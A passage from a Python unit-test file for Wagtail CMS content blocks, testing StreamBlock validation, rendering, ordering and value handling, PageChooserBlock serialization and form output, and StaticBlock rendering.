self.assertFalse(block.value_omitted_from_data({'mystream-count': '0'}, {}, 'mystream'))
self.assertFalse(block.value_omitted_from_data({
'mystream-count': '1',
'mystream-0-type': 'heading', 'mystream-0-value': 'hello',
'mystream-0-deleted': '', 'mystream-0-order': '0'
}, {}, 'mystream'))
self.assertTrue(block.value_omitted_from_data({'nothing-here': 'nope'}, {}, 'mystream'))
def test_validation_errors(self):
class ValidatedBlock(blocks.StreamBlock):
char = blocks.CharBlock()
url = blocks.URLBlock()
block = ValidatedBlock()
value = blocks.StreamValue(block, [
('char', ''),
('char', 'foo'),
('url', 'http://example.com/'),
('url', 'not a url'),
])
with self.assertRaises(ValidationError) as catcher:
block.clean(value)
self.assertEqual(catcher.exception.params, {
0: ['This field is required.'],
3: ['Enter a valid URL.'],
})
def test_min_num_validation_errors(self):
class ValidatedBlock(blocks.StreamBlock):
char = blocks.CharBlock()
url = blocks.URLBlock()
block = ValidatedBlock(min_num=1)
value = blocks.StreamValue(block, [])
with self.assertRaises(ValidationError) as catcher:
block.clean(value)
self.assertEqual(catcher.exception.params, {
'__all__': ['The minimum number of items is 1']
})
# a value with >= 1 blocks should pass validation
value = blocks.StreamValue(block, [('char', 'foo')])
self.assertTrue(block.clean(value))
def test_max_num_validation_errors(self):
class ValidatedBlock(blocks.StreamBlock):
char = blocks.CharBlock()
url = blocks.URLBlock()
block = ValidatedBlock(max_num=1)
value = blocks.StreamValue(block, [
('char', 'foo'),
('char', 'foo'),
('url', 'http://example.com/'),
('url', 'http://example.com/'),
])
with self.assertRaises(ValidationError) as catcher:
block.clean(value)
self.assertEqual(catcher.exception.params, {
'__all__': ['The maximum number of items is 1']
})
# a value with 1 block should pass validation
value = blocks.StreamValue(block, [('char', 'foo')])
self.assertTrue(block.clean(value))
def test_block_counts_min_validation_errors(self):
class ValidatedBlock(blocks.StreamBlock):
char = blocks.CharBlock()
url = blocks.URLBlock()
block = ValidatedBlock(block_counts={'char': {'min_num': 1}})
value = blocks.StreamValue(block, [
('url', 'http://example.com/'),
('url', 'http://example.com/'),
])
with self.assertRaises(ValidationError) as catcher:
block.clean(value)
self.assertEqual(catcher.exception.params, {
'__all__': ['Char: The minimum number of items is 1']
})
# a value with 1 char block should pass validation
value = blocks.StreamValue(block, [
('url', 'http://example.com/'),
('char', 'foo'),
('url', 'http://example.com/'),
])
self.assertTrue(block.clean(value))
def test_block_counts_max_validation_errors(self):
class ValidatedBlock(blocks.StreamBlock):
char = blocks.CharBlock()
url = blocks.URLBlock()
block = ValidatedBlock(block_counts={'char': {'max_num': 1}})
value = blocks.StreamValue(block, [
('char', 'foo'),
('char', 'foo'),
('url', 'http://example.com/'),
('url', 'http://example.com/'),
])
with self.assertRaises(ValidationError) as catcher:
block.clean(value)
self.assertEqual(catcher.exception.params, {
'__all__': ['Char: The maximum number of items is 1']
})
# a value with 1 char block should pass validation
value = blocks.StreamValue(block, [
('char', 'foo'),
('url', 'http://example.com/'),
('url', 'http://example.com/'),
])
self.assertTrue(block.clean(value))
def test_block_level_validation_renders_errors(self):
block = FooStreamBlock()
post_data = {'stream-count': '2'}
for i, value in enumerate(['bar', 'baz']):
post_data.update({
'stream-%d-deleted' % i: '',
'stream-%d-order' % i: str(i),
'stream-%d-type' % i: 'text',
'stream-%d-value' % i: value,
})
block_value = block.value_from_datadict(post_data, {}, 'stream')
with self.assertRaises(ValidationError) as catcher:
block.clean(block_value)
errors = ErrorList([
catcher.exception
])
self.assertInHTML(
format_html('<div class="help-block help-critical">{}</div>', FooStreamBlock.error),
block.render_form(block_value, prefix='stream', errors=errors))
def test_block_level_validation_render_no_errors(self):
block = FooStreamBlock()
post_data = {'stream-count': '3'}
for i, value in enumerate(['foo', 'bar', 'baz']):
post_data.update({
'stream-%d-deleted' % i: '',
'stream-%d-order' % i: str(i),
'stream-%d-type' % i: 'text',
'stream-%d-value' % i: value,
})
block_value = block.value_from_datadict(post_data, {}, 'stream')
try:
block.clean(block_value)
except ValidationError:
self.fail('Should have passed validation')
self.assertInHTML(
format_html('<div class="help-block help-critical">{}</div>', FooStreamBlock.error),
block.render_form(block_value, prefix='stream'),
count=0)
def test_html_declarations(self):
class ArticleBlock(blocks.StreamBlock):
heading = blocks.CharBlock()
paragraph = blocks.CharBlock()
block = ArticleBlock()
html = block.html_declarations()
self.assertTagInTemplateScript('<input type="hidden" id="__PREFIX__-id" name="__PREFIX__-id" value="" />', html)
self.assertTagInTemplateScript('<input type="hidden" id="__PREFIX__-type" name="__PREFIX__-type" value="heading" />', html)
self.assertTagInTemplateScript('<input id="__PREFIX__-value" name="__PREFIX__-value" placeholder="Heading" type="text" />', html)
self.assertTagInTemplateScript(
'<input id="__PREFIX__-value" name="__PREFIX__-value" placeholder="Paragraph" type="text" />',
html
)
def test_html_declarations_uses_default(self):
class ArticleBlock(blocks.StreamBlock):
heading = blocks.CharBlock(default="Fish found on moon")
paragraph = blocks.CharBlock(default="Lorem ipsum dolor sit amet")
block = ArticleBlock()
html = block.html_declarations()
self.assertTagInTemplateScript(
(
'<input id="__PREFIX__-value" name="__PREFIX__-value" placeholder="Heading"'
' type="text" value="Fish found on moon" />'
),
html
)
self.assertTagInTemplateScript(
(
'<input id="__PREFIX__-value" name="__PREFIX__-value" placeholder="Paragraph" type="text"'
' value="Lorem ipsum dolor sit amet" />'
),
html
)
def test_media_inheritance(self):
class ScriptedCharBlock(blocks.CharBlock):
media = forms.Media(js=['scripted_char_block.js'])
class ArticleBlock(blocks.StreamBlock):
heading = ScriptedCharBlock()
paragraph = blocks.CharBlock()
block = ArticleBlock()
self.assertIn('scripted_char_block.js', ''.join(block.all_media().render_js()))
def test_html_declaration_inheritance(self):
class CharBlockWithDeclarations(blocks.CharBlock):
def html_declarations(self):
return '<script type="text/x-html-template">hello world</script>'
class ArticleBlock(blocks.StreamBlock):
heading = CharBlockWithDeclarations(default="Torchbox")
paragraph = blocks.CharBlock()
block = ArticleBlock()
self.assertIn('<script type="text/x-html-template">hello world</script>', block.all_html_declarations())
def test_ordering_in_form_submission_uses_order_field(self):
class ArticleBlock(blocks.StreamBlock):
heading = blocks.CharBlock()
paragraph = blocks.CharBlock()
block = ArticleBlock()
# check that items are ordered by the 'order' field, not the order they appear in the form
post_data = {'article-count': '3'}
for i in range(0, 3):
post_data.update({
'article-%d-deleted' % i: '',
'article-%d-order' % i: str(2 - i),
'article-%d-type' % i: 'heading',
'article-%d-value' % i: "heading %d" % i,
'article-%d-id' % i: "000%d" % i,
})
block_value = block.value_from_datadict(post_data, {}, 'article')
self.assertEqual(block_value[2].value, "heading 0")
self.assertEqual(block_value[2].id, "0000")
def test_ordering_in_form_submission_is_numeric(self):
class ArticleBlock(blocks.StreamBlock):
heading = blocks.CharBlock()
paragraph = blocks.CharBlock()
block = ArticleBlock()
# check that items are ordered by 'order' numerically, not alphabetically
post_data = {'article-count': '12'}
for i in range(0, 12):
post_data.update({
'article-%d-deleted' % i: '',
'article-%d-order' % i: str(i),
'article-%d-type' % i: 'heading',
'article-%d-value' % i: "heading %d" % i
})
block_value = block.value_from_datadict(post_data, {}, 'article')
self.assertEqual(block_value[2].value, "heading 2")
def test_searchable_content(self):
class ArticleBlock(blocks.StreamBlock):
heading = blocks.CharBlock()
paragraph = blocks.CharBlock()
block = ArticleBlock()
value = block.to_python([
{
'type': 'heading',
'value': "My title",
},
{
'type': 'paragraph',
'value': 'My first paragraph',
},
{
'type': 'paragraph',
'value': 'My second paragraph',
},
])
content = block.get_searchable_content(value)
self.assertEqual(content, [
"My title",
"My first paragraph",
"My second paragraph",
])
def test_meta_default(self):
"""Test that we can specify a default value in the Meta of a StreamBlock"""
class ArticleBlock(blocks.StreamBlock):
heading = blocks.CharBlock()
paragraph = blocks.CharBlock()
class Meta:
default = [('heading', 'A default heading')]
# to access the default value, we retrieve it through a StructBlock
# from a struct value that's missing that key
class ArticleContainerBlock(blocks.StructBlock):
author = blocks.CharBlock()
article = ArticleBlock()
block = ArticleContainerBlock()
struct_value = block.to_python({'author': 'Bob'})
stream_value = struct_value['article']
self.assertTrue(isinstance(stream_value, blocks.StreamValue))
self.assertEqual(len(stream_value), 1)
self.assertEqual(stream_value[0].block_type, 'heading')
self.assertEqual(stream_value[0].value, 'A default heading')
def test_constructor_default(self):
"""Test that we can specify a default value in the constructor of a StreamBlock"""
class ArticleBlock(blocks.StreamBlock):
heading = blocks.CharBlock()
paragraph = blocks.CharBlock()
class Meta:
default = [('heading', 'A default heading')]
# to access the default value, we retrieve it through a StructBlock
# from a struct value that's missing that key
class ArticleContainerBlock(blocks.StructBlock):
author = blocks.CharBlock()
article = ArticleBlock(default=[('heading', 'A different default heading')])
block = ArticleContainerBlock()
struct_value = block.to_python({'author': 'Bob'})
stream_value = struct_value['article']
self.assertTrue(isinstance(stream_value, blocks.StreamValue))
self.assertEqual(len(stream_value), 1)
self.assertEqual(stream_value[0].block_type, 'heading')
self.assertEqual(stream_value[0].value, 'A different default heading')
def test_stream_value_equality(self):
block = blocks.StreamBlock([
('text', blocks.CharBlock()),
])
value1 = block.to_python([{'type': 'text', 'value': 'hello'}])
value2 = block.to_python([{'type': 'text', 'value': 'hello'}])
value3 = block.to_python([{'type': 'text', 'value': 'goodbye'}])
self.assertTrue(value1 == value2)
self.assertFalse(value1 != value2)
self.assertFalse(value1 == value3)
self.assertTrue(value1 != value3)
def test_render_considers_group_attribute(self):
"""If group attributes are set in Block Meta classes, render a <h4> for each different block"""
class Group1Block1(blocks.CharBlock):
class Meta:
group = 'group1'
class Group1Block2(blocks.CharBlock):
class Meta:
group = 'group1'
class Group2Block1(blocks.CharBlock):
class Meta:
group = 'group2'
class Group2Block2(blocks.CharBlock):
class Meta:
group = 'group2'
class NoGroupBlock(blocks.CharBlock):
pass
block = blocks.StreamBlock([
('b1', Group1Block1()),
('b2', Group1Block2()),
('b3', Group2Block1()),
('b4', Group2Block2()),
('ngb', NoGroupBlock()),
])
html = block.render_form('')
self.assertNotIn('<h4 class="c-sf-add-panel__group-title"></h4>', block.render_form(''))
self.assertIn('<h4 class="c-sf-add-panel__group-title">group1</h4>', html)
self.assertIn('<h4 class="c-sf-add-panel__group-title">group2</h4>', html)
def test_value_from_datadict(self):
class ArticleBlock(blocks.StreamBlock):
heading = blocks.CharBlock()
paragraph = blocks.CharBlock()
block = ArticleBlock()
value = block.value_from_datadict({
'foo-count': '3',
'foo-0-deleted': '',
'foo-0-order': '2',
'foo-0-type': 'heading',
'foo-0-id': '0000',
'foo-0-value': 'this is my heading',
'foo-1-deleted': '1',
'foo-1-order': '1',
'foo-1-type': 'heading',
'foo-1-id': '0001',
'foo-1-value': 'a deleted heading',
'foo-2-deleted': '',
'foo-2-order': '0',
'foo-2-type': 'paragraph',
'foo-2-id': '',
'foo-2-value': '<p>this is a paragraph</p>',
}, {}, prefix='foo')
self.assertEqual(len(value), 2)
self.assertEqual(value[0].block_type, 'paragraph')
self.assertEqual(value[0].id, '')
self.assertEqual(value[0].value, '<p>this is a paragraph</p>')
self.assertEqual(value[1].block_type, 'heading')
self.assertEqual(value[1].id, '0000')
self.assertEqual(value[1].value, 'this is my heading')
def check_get_prep_value(self, stream_data, is_lazy):
class ArticleBlock(blocks.StreamBlock):
heading = blocks.CharBlock()
paragraph = blocks.CharBlock()
block = ArticleBlock()
value = blocks.StreamValue(block, stream_data, is_lazy=is_lazy)
jsonish_value = block.get_prep_value(value)
self.assertEqual(len(jsonish_value), 2)
self.assertEqual(jsonish_value[0], {'type': 'heading', 'value': 'this is my heading', 'id': '0000'})
self.assertEqual(jsonish_value[1]['type'], 'paragraph')
self.assertEqual(jsonish_value[1]['value'], '<p>this is a paragraph</p>')
# get_prep_value should assign a new (random and non-empty)
# ID to this block, as it didn't have one already.
self.assertTrue(jsonish_value[1]['id'])
# Calling get_prep_value again should preserve existing IDs, including the one
# just assigned to block 1
jsonish_value_again = block.get_prep_value(value)
self.assertEqual(jsonish_value[0]['id'], jsonish_value_again[0]['id'])
self.assertEqual(jsonish_value[1]['id'], jsonish_value_again[1]['id'])
def test_get_prep_value_not_lazy(self):
stream_data = [
('heading', 'this is my heading', '0000'),
('paragraph', '<p>this is a paragraph</p>')
]
self.check_get_prep_value(stream_data, is_lazy=False)
def test_get_prep_value_is_lazy(self):
stream_data = [
{'type': 'heading', 'value': 'this is my heading', 'id': '0000'},
{'type': 'paragraph', 'value': '<p>this is a paragraph</p>'},
]
self.check_get_prep_value(stream_data, is_lazy=True)
def check_get_prep_value_nested_streamblocks(self, stream_data, is_lazy):
class TwoColumnBlock(blocks.StructBlock):
left = blocks.StreamBlock([('text', blocks.CharBlock())])
right = blocks.StreamBlock([('text', blocks.CharBlock())])
block = TwoColumnBlock()
value = {
k: blocks.StreamValue(block.child_blocks[k], v, is_lazy=is_lazy)
for k, v in stream_data.items()
}
jsonish_value = block.get_prep_value(value)
self.assertEqual(len(jsonish_value), 2)
self.assertEqual(
jsonish_value['left'],
[{'type': 'text', 'value': 'some text', 'id': '0000'}]
)
self.assertEqual(len(jsonish_value['right']), 1)
right_block = jsonish_value['right'][0]
self.assertEqual(right_block['type'], 'text')
self.assertEqual(right_block['value'], 'some other text')
# get_prep_value should assign a new (random and non-empty)
# ID to this block, as it didn't have one already.
self.assertTrue(right_block['id'])
def test_get_prep_value_nested_streamblocks_not_lazy(self):
stream_data = {
'left': [('text', 'some text', '0000')],
'right': [('text', 'some other text')],
}
self.check_get_prep_value_nested_streamblocks(stream_data, is_lazy=False)
def test_get_prep_value_nested_streamblocks_is_lazy(self):
stream_data = {
'left': [{
'type': 'text',
'value': 'some text',
'id': '0000',
}],
'right': [{
'type': 'text',
'value': 'some other text',
}],
}
self.check_get_prep_value_nested_streamblocks(stream_data, is_lazy=True)
def test_modifications_to_stream_child_id_are_saved(self):
class ArticleBlock(blocks.StreamBlock):
heading = blocks.CharBlock()
paragraph = blocks.CharBlock()
block = ArticleBlock()
stream = block.to_python([
{'type': 'heading', 'value': 'hello', 'id': '0001'},
{'type': 'paragraph', 'value': 'world', 'id': '0002'},
])
stream[1].id = '0003'
raw_data = block.get_prep_value(stream)
self.assertEqual(raw_data, [
{'type': 'heading', 'value': 'hello', 'id': '0001'},
{'type': 'paragraph', 'value': 'world', 'id': '0003'},
])
def test_modifications_to_stream_child_value_are_saved(self):
class ArticleBlock(blocks.StreamBlock):
heading = blocks.CharBlock()
paragraph = blocks.CharBlock()
block = ArticleBlock()
stream = block.to_python([
{'type': 'heading', 'value': 'hello', 'id': '0001'},
{'type': 'paragraph', 'value': 'world', 'id': '0002'},
])
stream[1].value = 'earth'
raw_data = block.get_prep_value(stream)
self.assertEqual(raw_data, [
{'type': 'heading', 'value': 'hello', 'id': '0001'},
{'type': 'paragraph', 'value': 'earth', 'id': '0002'},
])
def test_set_streamvalue_item(self):
class ArticleBlock(blocks.StreamBlock):
heading = blocks.CharBlock()
paragraph = blocks.CharBlock()
block = ArticleBlock()
stream = block.to_python([
{'type': 'heading', 'value': 'hello', 'id': '0001'},
{'type': 'paragraph', 'value': 'world', 'id': '0002'},
])
stream[1] = ('heading', 'goodbye', '0003')
raw_data = block.get_prep_value(stream)
self.assertEqual(raw_data, [
{'type': 'heading', 'value': 'hello', 'id': '0001'},
{'type': 'heading', 'value': 'goodbye', 'id': '0003'},
])
def test_delete_streamvalue_item(self):
class ArticleBlock(blocks.StreamBlock):
heading = blocks.CharBlock()
paragraph = blocks.CharBlock()
block = ArticleBlock()
stream = block.to_python([
{'type': 'heading', 'value': 'hello', 'id': '0001'},
{'type': 'paragraph', 'value': 'world', 'id': '0002'},
])
del stream[0]
raw_data = block.get_prep_value(stream)
self.assertEqual(raw_data, [
{'type': 'paragraph', 'value': 'world', 'id': '0002'},
])
def test_insert_streamvalue_item(self):
class ArticleBlock(blocks.StreamBlock):
heading = blocks.CharBlock()
paragraph = blocks.CharBlock()
block = ArticleBlock()
stream = block.to_python([
{'type': 'heading', 'value': 'hello', 'id': '0001'},
{'type': 'paragraph', 'value': 'world', 'id': '0002'},
])
stream.insert(1, ('paragraph', 'mutable', '0003'))
raw_data = block.get_prep_value(stream)
self.assertEqual(raw_data, [
{'type': 'heading', 'value': 'hello', 'id': '0001'},
{'type': 'paragraph', 'value': 'mutable', 'id': '0003'},
{'type': 'paragraph', 'value': 'world', 'id': '0002'},
])
def test_append_streamvalue_item(self):
class ArticleBlock(blocks.StreamBlock):
heading = blocks.CharBlock()
paragraph = blocks.CharBlock()
block = ArticleBlock()
stream = block.to_python([
{'type': 'heading', 'value': 'hello', 'id': '0001'},
{'type': 'paragraph', 'value': 'world', 'id': '0002'},
])
stream.append(('paragraph', 'of warcraft', '0003'))
raw_data = block.get_prep_value(stream)
self.assertEqual(raw_data, [
{'type': 'heading', 'value': 'hello', 'id': '0001'},
{'type': 'paragraph', 'value': 'world', 'id': '0002'},
{'type': 'paragraph', 'value': 'of warcraft', 'id': '0003'},
])
def test_streamvalue_raw_data(self):
class ArticleBlock(blocks.StreamBlock):
heading = blocks.CharBlock()
paragraph = blocks.CharBlock()
block = ArticleBlock()
stream = block.to_python([
{'type': 'heading', 'value': 'hello', 'id': '0001'},
{'type': 'paragraph', 'value': 'world', 'id': '0002'},
])
self.assertEqual(stream.raw_data[0], {'type': 'heading', 'value': 'hello', 'id': '0001'})
stream.raw_data[0]['value'] = 'bonjour'
self.assertEqual(stream.raw_data[0], {'type': 'heading', 'value': 'bonjour', 'id': '0001'})
# changes to raw_data will be written back via get_prep_value...
raw_data = block.get_prep_value(stream)
self.assertEqual(raw_data, [
{'type': 'heading', 'value': 'bonjour', 'id': '0001'},
{'type': 'paragraph', 'value': 'world', 'id': '0002'},
])
# ...but once the bound-block representation has been accessed, that takes precedence
self.assertEqual(stream[0].value, 'bonjour')
stream.raw_data[0]['value'] = 'guten tag'
self.assertEqual(stream.raw_data[0]['value'], 'guten tag')
self.assertEqual(stream[0].value, 'bonjour')
raw_data = block.get_prep_value(stream)
self.assertEqual(raw_data, [
{'type': 'heading', 'value': 'bonjour', 'id': '0001'},
{'type': 'paragraph', 'value': 'world', 'id': '0002'},
])
# Replacing a raw_data entry outright will propagate to the bound block, though
stream.raw_data[0] = {'type': 'heading', 'value': 'konnichiwa', 'id': '0003'}
raw_data = block.get_prep_value(stream)
self.assertEqual(raw_data, [
{'type': 'heading', 'value': 'konnichiwa', 'id': '0003'},
{'type': 'paragraph', 'value': 'world', 'id': '0002'},
])
self.assertEqual(stream[0].value, 'konnichiwa')
# deletions / insertions on raw_data will also propagate to the bound block representation
del stream.raw_data[1]
stream.raw_data.insert(0, {'type': 'paragraph', 'value': 'hello kitty says', 'id': '0004'})
raw_data = block.get_prep_value(stream)
self.assertEqual(raw_data, [
{'type': 'paragraph', 'value': 'hello kitty says', 'id': '0004'},
{'type': 'heading', 'value': 'konnichiwa', 'id': '0003'},
])
def test_render_with_classname_via_kwarg(self):
"""form_classname from kwargs to be used as an additional class when rendering stream block"""
block = blocks.StreamBlock([
(b'heading', blocks.CharBlock()),
(b'paragraph', blocks.CharBlock()),
], form_classname='rocket-section')
value = block.to_python([
{
'type': 'heading',
'value': "Falcon Heavy",
'id': '2',
},
{
'type': 'paragraph',
'value': "Ultra heavy launch capability",
'id': '3',
}
])
html = block.render_form(value)
# including leading space to ensure class name gets added correctly
self.assertEqual(html.count(' rocket-section'), 1)
def test_render_with_classname_via_class_meta(self):
"""form_classname from meta to be used as an additional class when rendering stream block"""
class ProfileBlock(blocks.StreamBlock):
username = blocks.CharBlock()
class Meta:
form_classname = 'profile-block-large'
block = ProfileBlock()
value = block.to_python([
{
'type': 'username',
'value': "renegadeM@ster",
'id': '789',
}
])
html = block.render_form(value, prefix='profiles')
# including leading space to ensure class name gets added correctly
self.assertEqual(html.count(' profile-block-large'), 1)
class TestStructBlockWithFixtures(TestCase):
fixtures = ['test.json']
def test_bulk_to_python(self):
page_link_block = blocks.StructBlock([
('page', blocks.PageChooserBlock(required=False)),
('link_text', blocks.CharBlock(default="missing title")),
])
with self.assertNumQueries(1):
result = page_link_block.bulk_to_python([
{'page': 2, 'link_text': 'page two'},
{'page': 3, 'link_text': 'page three'},
{'page': None, 'link_text': 'no page'},
{'page': 4},
])
result_types = [type(val) for val in result]
self.assertEqual(result_types, [blocks.StructValue] * 4)
result_titles = [val['link_text'] for val in result]
self.assertEqual(result_titles, ['page two', 'page three', 'no page', 'missing title'])
result_pages = [val['page'] for val in result]
self.assertEqual(result_pages, [
Page.objects.get(id=2), Page.objects.get(id=3), None, Page.objects.get(id=4)
])
class TestStreamBlockWithFixtures(TestCase):
fixtures = ['test.json']
def test_bulk_to_python(self):
stream_block = blocks.StreamBlock([
('page', blocks.PageChooserBlock()),
('heading', blocks.CharBlock()),
])
# The naive implementation of bulk_to_python (calling to_python on each item) would perform
# NO queries, as StreamBlock.to_python returns a lazy StreamValue that only starts calling
# to_python on its children (and thus triggering DB queries) when its items are accessed.
# This is a good thing for a standalone to_python call, because loading a model instance
# with a StreamField in it will immediately call StreamField.to_python which in turn calls
# to_python on the top-level StreamBlock, and we really don't want
# SomeModelWithAStreamField.objects.get(id=1) to immediately trigger a cascading fetch of
# all objects referenced in the StreamField.
#
# However, for bulk_to_python that's bad, as it means each stream in the list would end up
# doing its own object lookups in isolation, missing the opportunity to group them together
# into a single call to the child block's bulk_to_python. Therefore, the ideal outcome is
# that we perform one query now (covering all PageChooserBlocks across all streams),
# returning a list of non-lazy StreamValues.
with self.assertNumQueries(1):
results = stream_block.bulk_to_python([
[{'type': 'heading', 'value': 'interesting pages'}, {'type': 'page', 'value': 2}, {'type': 'page', 'value': 3}],
[{'type': 'heading', 'value': 'pages written by dogs'}, {'type': 'woof', 'value': 'woof woof'}],
[{'type': 'heading', 'value': 'boring pages'}, {'type': 'page', 'value': 4}],
])
# If bulk_to_python has indeed given us non-lazy StreamValues, then no further queries
# should be performed when iterating over its child blocks.
with self.assertNumQueries(0):
block_types = [
[block.block_type for block in stream]
for stream in results
]
self.assertEqual(block_types, [
['heading', 'page', 'page'],
['heading'],
['heading', 'page'],
])
with self.assertNumQueries(0):
block_values = [
[block.value for block in stream]
for stream in results
]
self.assertEqual(block_values, [
['interesting pages', Page.objects.get(id=2), Page.objects.get(id=3)],
['pages written by dogs'],
['boring pages', Page.objects.get(id=4)],
])
class TestPageChooserBlock(TestCase):
fixtures = ['test.json']
def test_serialize(self):
"""The value of a PageChooserBlock (a Page object) should serialize to an ID"""
block = blocks.PageChooserBlock()
christmas_page = Page.objects.get(slug='christmas')
self.assertEqual(block.get_prep_value(christmas_page), christmas_page.id)
# None should serialize to None
self.assertEqual(block.get_prep_value(None), None)
def test_deserialize(self):
"""The serialized value of a PageChooserBlock (an ID) should deserialize to a Page object"""
block = blocks.PageChooserBlock()
christmas_page = Page.objects.get(slug='christmas')
self.assertEqual(block.to_python(christmas_page.id), christmas_page)
# None should deserialize to None
self.assertEqual(block.to_python(None), None)
def test_form_render(self):
block = blocks.PageChooserBlock(help_text="pick a page, any page")
empty_form_html = block.render_form(None, 'page')
self.assertInHTML('<input id="page" name="page" placeholder="" type="hidden" />', empty_form_html)
self.assertIn('createPageChooser("page", ["wagtailcore.page"], null, false, null);', empty_form_html)
christmas_page = Page.objects.get(slug='christmas')
christmas_form_html = block.render_form(christmas_page, 'page')
expected_html = '<input id="page" name="page" placeholder="" type="hidden" value="%d" />' % christmas_page.id
self.assertInHTML(expected_html, christmas_form_html)
self.assertIn("pick a page, any page", christmas_form_html)
def test_form_render_with_target_model_default(self):
block = blocks.PageChooserBlock()
empty_form_html = block.render_form(None, 'page')
self.assertIn('createPageChooser("page", ["wagtailcore.page"], null, false, null);', empty_form_html)
def test_form_render_with_target_model_string(self):
block = blocks.PageChooserBlock(help_text="pick a page, any page", page_type='tests.SimplePage')
empty_form_html = block.render_form(None, 'page')
self.assertIn('createPageChooser("page", ["tests.simplepage"], null, false, null);', empty_form_html)
def test_form_render_with_target_model_literal(self):
block = blocks.PageChooserBlock(help_text="pick a page, any page", page_type=SimplePage)
empty_form_html = block.render_form(None, 'page')
self.assertIn('createPageChooser("page", ["tests.simplepage"], null, false, null);', empty_form_html)
def test_form_render_with_target_model_multiple_strings(self):
block = blocks.PageChooserBlock(help_text="pick a page, any page", page_type=['tests.SimplePage', 'tests.EventPage'])
empty_form_html = block.render_form(None, 'page')
self.assertIn('createPageChooser("page", ["tests.simplepage", "tests.eventpage"], null, false, null);', empty_form_html)
def test_form_render_with_target_model_multiple_literals(self):
block = blocks.PageChooserBlock(help_text="pick a page, any page", page_type=[SimplePage, EventPage])
empty_form_html = block.render_form(None, 'page')
self.assertIn('createPageChooser("page", ["tests.simplepage", "tests.eventpage"], null, false, null);', empty_form_html)
def test_form_render_with_can_choose_root(self):
block = blocks.PageChooserBlock(help_text="pick a page, any page", can_choose_root=True)
empty_form_html = block.render_form(None, 'page')
self.assertIn('createPageChooser("page", ["wagtailcore.page"], null, true, null);', empty_form_html)
def test_form_response(self):
block = blocks.PageChooserBlock()
christmas_page = Page.objects.get(slug='christmas')
value = block.value_from_datadict({'page': str(christmas_page.id)}, {}, 'page')
self.assertEqual(value, christmas_page)
empty_value = block.value_from_datadict({'page': ''}, {}, 'page')
self.assertEqual(empty_value, None)
def test_clean(self):
required_block = blocks.PageChooserBlock()
nonrequired_block = blocks.PageChooserBlock(required=False)
christmas_page = Page.objects.get(slug='christmas')
self.assertEqual(required_block.clean(christmas_page), christmas_page)
with self.assertRaises(ValidationError):
required_block.clean(None)
self.assertEqual(nonrequired_block.clean(christmas_page), christmas_page)
self.assertEqual(nonrequired_block.clean(None), None)
def test_target_model_default(self):
block = blocks.PageChooserBlock()
self.assertEqual(block.target_model, Page)
def test_target_model_string(self):
block = blocks.PageChooserBlock(page_type='tests.SimplePage')
self.assertEqual(block.target_model, SimplePage)
def test_target_model_literal(self):
block = blocks.PageChooserBlock(page_type=SimplePage)
self.assertEqual(block.target_model, SimplePage)
def test_target_model_multiple_strings(self):
block = blocks.PageChooserBlock(page_type=['tests.SimplePage', 'tests.EventPage'])
self.assertEqual(block.target_model, Page)
def test_target_model_multiple_literals(self):
block = blocks.PageChooserBlock(page_type=[SimplePage, EventPage])
self.assertEqual(block.target_model, Page)
def test_deconstruct_target_model_default(self):
block = blocks.PageChooserBlock()
self.assertEqual(block.deconstruct(), (
'wagtail.core.blocks.PageChooserBlock',
(), {}))
def test_deconstruct_target_model_string(self):
block = blocks.PageChooserBlock(page_type='tests.SimplePage')
self.assertEqual(block.deconstruct(), (
'wagtail.core.blocks.PageChooserBlock',
(), {'page_type': ['tests.SimplePage']}))
def test_deconstruct_target_model_literal(self):
block = blocks.PageChooserBlock(page_type=SimplePage)
self.assertEqual(block.deconstruct(), (
'wagtail.core.blocks.PageChooserBlock',
(), {'page_type': ['tests.SimplePage']}))
def test_deconstruct_target_model_multiple_strings(self):
block = blocks.PageChooserBlock(page_type=['tests.SimplePage', 'tests.EventPage'])
self.assertEqual(block.deconstruct(), (
'wagtail.core.blocks.PageChooserBlock',
(), {'page_type': ['tests.SimplePage', 'tests.EventPage']}))
def test_deconstruct_target_model_multiple_literals(self):
block = blocks.PageChooserBlock(page_type=[SimplePage, EventPage])
self.assertEqual(block.deconstruct(), (
'wagtail.core.blocks.PageChooserBlock',
(), {'page_type': ['tests.SimplePage', 'tests.EventPage']}))
def test_bulk_to_python(self):
page_ids = [2, 3, 4, 5]
expected_pages = Page.objects.filter(pk__in=page_ids)
block = blocks.PageChooserBlock()
with self.assertNumQueries(1):
pages = block.bulk_to_python(page_ids)
self.assertSequenceEqual(pages, expected_pages)
class TestStaticBlock(unittest.TestCase):
def test_render_form_with_constructor(self):
block = blocks.StaticBlock(
admin_text="Latest posts - This block doesn't need to be configured, it will be displayed automatically",
template='tests/blocks/posts_static_block.html')
rendered_html = block.render_form(None)
self.assertEqual(rendered_html, "Latest posts - This block doesn't need to be configured, it will be displayed automatically")
def test_render_form_with_subclass(self):
class PostsStaticBlock(blocks.StaticBlock):
class Meta:
admin_text = "Latest posts - This block doesn't need to be configured, it will be displayed automatically"
template = "tests/blocks/posts_static_block.html"
block = PostsStaticBlock()
rendered_html = block.render_form(None)
self.assertEqual(rendered_html, "Latest posts - This block doesn't need to be configured, it will be displayed automatically")
def test_render_form_with_subclass_displays_default_text_if_no_admin_text(self):
class LabelOnlyStaticBlock(blocks.StaticBlock):
class Meta:
label = "Latest posts"
block = LabelOnlyStaticBlock()
rendered_html = block.render_form(None)
self.assertEqual(rendered_html, "Latest posts: this block has no options.")
def test_render_form_with_subclass_displays_default_text_if_no_admin_text_and_no_label(self):
class NoMetaStaticBlock(blocks.StaticBlock):
pass
block = NoMetaStaticBlock()
rendered_html = block.render_form(None)
self.assertEqual(rendered_html, "This block has no options.")
def test_render_form_works_with_mark_safe(self):
block = blocks.StaticBlock(
admin_text=mark_safe("<b>Latest posts</b> - This block doesn't need to be configured, it will be displayed automatically"),
template='tests/blocks/posts_static_block.html')
rendered_html = block.render_form(None)
self.assertEqual(rendered_html, "<b>Latest posts</b> - This block doesn't need to be configured, it will be displayed automatically")
def test_get_default(self):
block = blocks.StaticBlock()
default_value = block.get_default()
self.assertEqual(default_value, None)
def test_render(self):
block = blocks.StaticBlock(template='tests/blocks/posts_static_block.html')
result = block.render(None)
self.assertEqual(result, '<p>PostsStaticBlock template</p>')
def test_serialize(self):
block = blocks.StaticBlock()
result = block.get_prep_value(None)
self.assertEqual(result, None)
def test_deserialize(self):
block = blocks.StaticBlock()
result = block.to_python(None)
self.assertEqual(result, None)
class TestDateBlock(TestCase):
def test_render_form(self):
block = blocks.DateBlock()
value = date(2015, 8, 13)
result = block.render_form(value, prefix='dateblock')
# we should see the JS initialiser code:
